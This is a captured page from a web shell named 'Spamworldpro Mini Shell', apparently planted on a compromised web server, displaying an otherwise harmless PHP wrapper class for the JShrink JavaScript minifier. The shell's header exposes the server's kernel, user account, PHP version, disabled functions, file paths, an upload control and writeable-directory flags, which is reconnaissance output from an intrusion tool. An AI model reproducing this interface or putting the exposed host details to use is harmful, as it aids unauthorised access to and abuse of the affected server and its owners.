Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/demo.intellicart.co/vendor/mrclay/minify/lib/Minify/JS/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/demo.intellicart.co/vendor/mrclay/minify/lib/Minify/JS/JShrink.php
<?php
/**
 * Class Minify\JS\JShrink
 *
 * @package Minify
 */

namespace Minify\JS;

/**
 * Wrapper to Javascript Minifier built in PHP http://www.tedivm.com
 *
 * @package Minify
 * @author  Elan Ruusamäe <[email protected]>
 * @link    https://github.com/tedious/JShrink
 *
 */
class JShrink
{
    /**
     * Contains the default options for minification. This array is merged with
     * the one passed in by the user to create the request specific set of
     * options (stored in the $options attribute).
     *
     * @var string[]
     */
    protected static $defaultOptions = array('flaggedComments' => true);

    /**
     * Takes a string containing javascript and removes unneeded characters in
     * order to shrink the code without altering it's functionality.
     *
     * @param  string $js      The raw javascript to be minified
     * @param  array  $options Various runtime options in an associative array
     *
     * @see JShrink\Minifier::minify()
     * @return string
     */
    public static function minify($js, array $options = array())
    {
        $options = array_merge(
            self::$defaultOptions,
            $options
        );

        return \JShrink\Minifier::minify($js, $options);
    }
}

Spamworldpro Mini